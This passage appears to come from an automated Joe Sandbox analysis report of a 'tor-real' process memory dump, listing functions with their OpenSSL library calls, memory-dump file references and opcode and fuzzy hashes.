                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$C_get_current_job
                                                                            • String ID: x
                                                                            • API String ID: 2484768174-2363233923
                                                                            • Opcode ID: bb4315d45bf5fdd479740e90f117116cbdd1f5fba4d46ae927c92d74e6e756cb
                                                                            • Instruction ID: 046a55bc513c91bb91550889a46583214119a32d40c70bbb5a27b586fe61d450
                                                                            • Opcode Fuzzy Hash: bb4315d45bf5fdd479740e90f117116cbdd1f5fba4d46ae927c92d74e6e756cb
                                                                            • Instruction Fuzzy Hash: 6051F4B050C3469FE700DF64C58478ABBE0BF85358F508D1CE8D89B791E7B9E5888B96
                                                                            Function 6C0A6968 Relevance: 15.1, APIs: 10, Instructions: 73stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 6C0A6973
                                                                            • strlen.MSVCRT ref: 6C0A697D
                                                                            • BIO_snprintf.LIBCRYPTO-1_1 ref: 6C0A69AC
                                                                              • Part of subcall function 6C0A6790: OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A67BD
                                                                              • Part of subcall function 6C0A6790: BIO_s_file.LIBCRYPTO-1_1 ref: 6C0A67C6
                                                                              • Part of subcall function 6C0A6790: BIO_new.LIBCRYPTO-1_1 ref: 6C0A67CE
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            • _errno.MSVCRT ref: 6C0A69ED
                                                                            • GetLastError.KERNEL32 ref: 6C0A6A02
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6A2B
                                                                            • ERR_add_error_data.LIBCRYPTO-1_1 ref: 6C0A6A4B
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6A77
                                                                            • OPENSSL_DIR_end.LIBCRYPTO-1_1 ref: 6C0A6A91
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6ADF
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$strlen$ErrorL_sk_set_cmp_funcLastO_newO_s_fileO_snprintfR_add_error_dataR_endR_read_errno
                                                                            • String ID:
                                                                            • API String ID: 526503982-0
                                                                            • Opcode ID: 12f5b731e229d490811ae228e3917c6779678807e2ef9b464888aa282121048b
                                                                            • Instruction ID: c9ee444c96a788cc15cfd217ede15ecbc624eb1d3e76d0174dd6b757b94ff032
                                                                            • Opcode Fuzzy Hash: 12f5b731e229d490811ae228e3917c6779678807e2ef9b464888aa282121048b
                                                                            • Instruction Fuzzy Hash: 7E3114B15093019FD3009FA9C08475EBBF0BF84748F818C2DE8A897751D775E58A8F86
                                                                            Function 6C0A6DCB Relevance: 15.1, APIs: 10, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DD7
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DE7
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A6DF6
                                                                            • X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0A6DFE
                                                                            • OPENSSL_sk_pop.LIBCRYPTO-1_1 ref: 6C0A6E13
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6E1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_num$X509_$E_freeL_sk_popL_sk_pop_freeL_sk_valueX509_freeX509_get_extension_flagsX_free
                                                                            • String ID:
                                                                            • API String ID: 2994630309-0
                                                                            • Opcode ID: e9661599e5b1f01fbca3e6e62f6d63a9a9951631d64f1ca774a8f6501bdc4c96
                                                                            • Instruction ID: 32ac4cc38e2f1741d6679f87c07f8cc8c384aabc963170df4708ee9b97b33953
                                                                            • Opcode Fuzzy Hash: e9661599e5b1f01fbca3e6e62f6d63a9a9951631d64f1ca774a8f6501bdc4c96
                                                                            • Instruction Fuzzy Hash: F121C7719497109FC700AFA8818435EFBF0AF88754F92492DE8D49BB12D774E8868F82
                                                                            Function 6C0E69B0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 347COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /$D
                                                                            • API String ID: 0-1275706592
                                                                            • Opcode ID: f7d130f6b281e598e927100837d897dd989905fcbdedb9dfd3713f0c1262476f
                                                                            • Instruction ID: 5764d7df9af8e647294641e7dd129434c93ad5531017ac4115d62f65bdf61618
                                                                            • Opcode Fuzzy Hash: f7d130f6b281e598e927100837d897dd989905fcbdedb9dfd3713f0c1262476f
                                                                            • Instruction Fuzzy Hash: E8E1BF306893098FC714DF24D08076AB7E1FF88318F158A6DDAA4DBB91DB30E945CB91
                                                                            Function 6C0ACEC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASYNC_start_job.LIBCRYPTO-1_1 ref: 6C0ACF0A
                                                                            • ASYNC_WAIT_CTX_new.LIBCRYPTO-1_1 ref: 6C0ACF70
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0ACFCE
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0AD00E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$C_start_jobX_new
                                                                            • String ID: D
                                                                            • API String ID: 806409594-2746444292
                                                                            • Opcode ID: 4b9c36b140ac7dc06b9ed49fbc0641dd4239f41f03f0944988dc227317ce6372
                                                                            • Instruction ID: 38da5683abe264b79ceeae28f1202e044e42c58fd40a4406c4d3795e8b66c1a3
                                                                            • Opcode Fuzzy Hash: 4b9c36b140ac7dc06b9ed49fbc0641dd4239f41f03f0944988dc227317ce6372
                                                                            • Instruction Fuzzy Hash: DA4180B15083018FC710DFA9C48078BBBF0BF89358F518A1DE8A89B791D775E54ACB92
                                                                            Function 6C0D8650 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D8706
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numO_zalloc
                                                                            • String ID: 9$D$P
                                                                            • API String ID: 485224183-1575434384
                                                                            • Opcode ID: d047e64463945d8ea1ff1fec6829dfdcc1f897e80936eb91d49ddfaaf4a05ae3
                                                                            • Instruction ID: 604c09507e892f129e971337ea5ae2273c718d49a09cec1ea3e4462638b4faf4
                                                                            • Opcode Fuzzy Hash: d047e64463945d8ea1ff1fec6829dfdcc1f897e80936eb91d49ddfaaf4a05ae3
                                                                            • Instruction Fuzzy Hash: B2410FB06093019FD700DF25C58434EBBF0AB88798F519A2EE89897700E774EA489F93
                                                                            Function 6C0B0EBB Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_VERIFY_PARAM_set1_host.LIBCRYPTO-1_1 ref: 6C0B0F0C
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B0F3E
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0F87
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0FBF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B102F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B1067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$L_sk_new_nullM_set1_hostX509_
                                                                            • String ID: 7$A
                                                                            • API String ID: 3990112349-777435815
                                                                            • Opcode ID: 2f6f0a512f93ee50a010cd006697f2ab0a01081b8ce79b198b1c93198d7a25a0
                                                                            • Instruction ID: 9030e044bea3c7cd97b10309917dcb37575d6c0f263aebe977bc6ceb463644d3
                                                                            • Opcode Fuzzy Hash: 2f6f0a512f93ee50a010cd006697f2ab0a01081b8ce79b198b1c93198d7a25a0
                                                                            • Instruction Fuzzy Hash: 093139F06093469FE700CF64C58438A7BE0BB8531CF248A2CE9A89F791D7B9D5489B56
                                                                            Function 6C0A666C Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PEM_read_bio_X509.LIBCRYPTO-1_1 ref: 6C0A661B
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A6633
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6641
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0A6653
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A6665
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A6670
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A66A2
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A66B3
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A66C5
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A66CD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A66D9
                                                                            • OPENSSL_LH_free.LIBCRYPTO-1_1 ref: 6C0A66E1
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A6785
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_free$E_dupH_freeH_retrieveL_sk_new_nullL_sk_pop_freeM_read_bio_O_freeR_put_errorX509X509_freeX509_get_subject_name__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 3354858419-3554254475
                                                                            • Opcode ID: 70f218dc80dc8bfd560ba444971f34240f2d7bce8b76906e8358a1c0ae3f4b5a
                                                                            • Instruction ID: 148e5b8301fe98c5085d8c59d965434a20567912c6c7958aece3c5966b25a72d
                                                                            • Opcode Fuzzy Hash: 70f218dc80dc8bfd560ba444971f34240f2d7bce8b76906e8358a1c0ae3f4b5a
                                                                            • Instruction Fuzzy Hash: 0201F6B1648701CFD300AFA5C48039EFBF0BF49358F52882CD5D8ABB11D779A94A8B46
                                                                            Function 6C0A8754 Relevance: 13.5, APIs: 9, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A8763
                                                                            • OPENSSL_sk_delete.LIBCRYPTO-1_1 ref: 6C0A877C
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A8784
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A87BA
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A87C6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A87DA
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A87EC
                                                                            • OPENSSL_sk_sort.LIBCRYPTO-1_1 ref: 6C0A87F6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A8801
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_freeL_sk_num$L_sk_deleteL_sk_dupL_sk_set_cmp_funcL_sk_sortL_sk_value
                                                                            • String ID:
                                                                            • API String ID: 1089248418-0
                                                                            • Opcode ID: 20a0101cd74f620716f34a960c410989422f467f12a7fa2556c9968127323995
                                                                            • Instruction ID: d25c5982dec6b21f2ff3c4b36ef4940d47f6a352d853a4565de6718914905dd6
                                                                            • Opcode Fuzzy Hash: 20a0101cd74f620716f34a960c410989422f467f12a7fa2556c9968127323995
                                                                            • Instruction Fuzzy Hash: 890109B4545B418FD700AFA4C49035DBBF1BF4C348F61492DE5948BB02D774E5858F82
                                                                            Function 6C0AAAF7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: H_freeHparamsM_read_bio_O_ctrlO_freeO_newO_s_file
                                                                            • String ID: l
                                                                            • API String ID: 2896938982-2517025534
                                                                            • Opcode ID: 6e06d7491093b9e592f77c9b189095e5f0ba281e2da052c5e1cb8fccbc28c228
                                                                            • Instruction ID: 2ab8108218d6e9895405389fe4ebe2dd34044d08f9a7decb5482781c2f5c4dbe
                                                                            • Opcode Fuzzy Hash: 6e06d7491093b9e592f77c9b189095e5f0ba281e2da052c5e1cb8fccbc28c228
                                                                            • Instruction Fuzzy Hash: 4A214FB06097069FE300AFB5C49435BBBE6BF84758F21C91CE4988B782D779D4458F82
                                                                            Function 6C0B2655 Relevance: 12.1, APIs: 8, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0E936C
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E93CA
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0E93E9
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E940C
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E9428
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E944B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Final_exInit_ex$UpdateX_new
                                                                            • String ID:
                                                                            • API String ID: 3873810720-0
                                                                            • Opcode ID: 24a039935871cb92e34d74063da806bfd797a44259faed1401d872d4d83f5b5e
                                                                            • Instruction ID: 0b65d3d0d2043377cfbf416586eb351d077d860af7c13b648fe4d39a9db16aa1
                                                                            • Opcode Fuzzy Hash: 24a039935871cb92e34d74063da806bfd797a44259faed1401d872d4d83f5b5e
                                                                            • Instruction Fuzzy Hash: 0C51B1B16497059FD310DF2AC58079BBBF4AF88748F118D2EE99887710E735E944CB92
                                                                            Function 6C0AA710 Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
